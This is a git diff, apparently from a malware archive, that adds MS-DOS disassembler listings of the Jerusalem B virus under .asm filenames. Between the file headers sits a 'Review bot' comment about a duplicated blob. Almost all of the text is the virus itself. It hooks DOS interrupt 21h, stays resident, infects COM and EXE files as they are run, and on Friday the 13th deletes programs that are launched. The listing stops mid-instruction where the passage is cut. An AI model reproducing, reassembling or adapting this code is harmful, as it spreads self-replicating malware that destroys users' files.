+0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? 
DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL 
+0000:06CF 0000 ADD [BX+SI],AL
+0000:06D1 0000 ADD [BX+SI],AL
+0000:06D3 0000 ADD [BX+SI],AL
+0000:06D5 0000 ADD [BX+SI],AL
+0000:06D7 0000 ADD [BX+SI],AL
+0000:06D9 005718 ADD [BX+018H],DL
+0000:06DC 0825 OR [DI],AH
+0000:06DE A5 MOVSW
+0000:06DF FEC5 INC CH
+0000:06E1 07 POP ES
+0000:06E2 1E PUSH DS
+0000:06E3 0210 ADD DL,[BX+SI]
+0000:06E5 07 POP ES
+0000:06E6 57 PUSH DI
+0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
+0000:06EB 0104 ADD [SI],AX
+0000:06ED 7F70 JG X075F
+
+"JV.MOC" PAGE 0014
+
+0000:06EF 0010 ADD [BX+SI],DL
+0000:06F1 07 POP ES
+0000:06F2 1D001C SBB AX,01C00H
+0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
+0000:06F9 0C1B OR AL,01BH
+0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
+0000:06FF F24D REPNE DEC BP
+0000:0701 360E PUSH CS
+0000:0703 0300 ADD AX,[BX+SI]
+0000:0705 0000 ADD [BX+SI],AL
+0000:0707 00EE ADD DH,CH
+0000:0709 002A X0709: ADD [BP+SI],CH
+0000:070B 0F POP CS
+0000:070C 42 INC DX
+0000:070D 01C1 ADD CX,AX
+0000:070F 0DB44C OR AX,04CB4H
+0000:0712 B000 MOV AL,00H
+0000:0714 CD21 X0714: INT 021H
+0000:0716 4D DEC BP
+0000:0717 7344 JAE X075D
+0000:0719 6F73 JG X078E
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-s.asm b/MSDOS/Virus.MSDOS.Unknown.jeru-s.asm
new file mode 100644
index 00000000..556a184d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jeru-s.asm
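Review bot: The blob recorded for this file, `index 00000000..556a184d`, is the same blob the next file header records for MSDOS/Virus.MSDOS.Unknown.jeru-s.asm, so the archive gains two byte-identical copies under different names and extensions, one of them labelled `.asm` although its first text line says "This is the Jerusalem B Virus." and the content is a disassembler listing (address, opcode bytes, mnemonic per line, page headers such as `"JV.MOC" PAGE 0001`) rather than assemblable source. Listings of this kind also decode data regions as instructions — the zero-filled run at 0000:0022–002C appears as `ADD [BX+SI],AL` — which is expected for a listing but misleading when the file is presented as `.asm`. For corpus hygiene it would be worth deduplicating the identical blob, or at least putting a one-line note at the top of each copy that it is a `.lst`-style disassembly of the same sample, e.g. `; disassembler listing (not buildable source); identical to Virus.MSDOS.Unknown.jeru-b.lst`. The preceding jeru-b.asm section starts outside this chunk, so whether it is the same blob cannot be confirmed here.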
@@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP 
[BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV 
CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV 
AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H 
+0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H 
+0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 
MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 
MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR 
[Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD 